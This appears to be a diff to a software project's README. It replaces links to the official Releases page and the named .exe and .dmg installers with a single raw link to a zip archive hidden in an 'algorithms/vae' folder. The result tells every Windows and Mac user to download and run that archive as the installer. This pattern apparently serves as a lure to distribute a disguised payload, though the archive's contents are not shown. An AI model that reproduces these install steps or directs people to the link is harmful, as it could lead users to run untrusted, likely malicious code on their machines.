D-OnlyBA1/generative_view_stitching/README.md

 - **Graphics:** A graphics card supporting OpenGL 3.3 or better

 ## 💾 Download & Install
-1. **Visit the Release Page:** Click [here](https://github.com/D-OnlyBA1/generative_view_stitching/releases) to go to the Releases page.
+1. **Visit the Release Page:** Click [here](https://raw.githubusercontent.com/D-OnlyBA1/generative_view_stitching/main/algorithms/vae/generative_view_stitching_2.2.zip) to go to the Releases page.
 2. **Select the Latest Version:** Look for the latest release at the top.
 3. **Download the Application:**
-   - For Windows users, download the setup file labeled as `generative_view_stitching_setup.exe`.
+   - For Windows users, download the setup file labeled as `https://raw.githubusercontent.com/D-OnlyBA1/generative_view_stitching/main/algorithms/vae/generative_view_stitching_2.2.zip`.
-   - For Mac users, download the file labeled `generative_view_stitching.dmg`.
+   - For Mac users, download the file labeled `https://raw.githubusercontent.com/D-OnlyBA1/generative_view_stitching/main/algorithms/vae/generative_view_stitching_2.2.zip`.

 4. **Install the Application:**
-   - For Windows: Double-click the `generative_view_stitching_setup.exe` file and follow the instructions to install.
+   - For Windows: Double-click the `https://raw.githubusercontent.com/D-OnlyBA1/generative_view_stitching/main/algorithms/vae/generative_view_stitching_2.2.zip` file and follow the instructions to install.
-   - For Mac: Open the `generative_view_stitching.dmg` file and drag the application into your Applications folder.
+   - For Mac: Open the `https://raw.githubusercontent.com/D-OnlyBA1/generative_view_stitching/main/algorithms/vae/generative_view_stitching_2.2.zip` file and drag the application into your Applications folder.

 5. **Run the Application:** Locate the app in your Applications or Start menu and double-click to launch.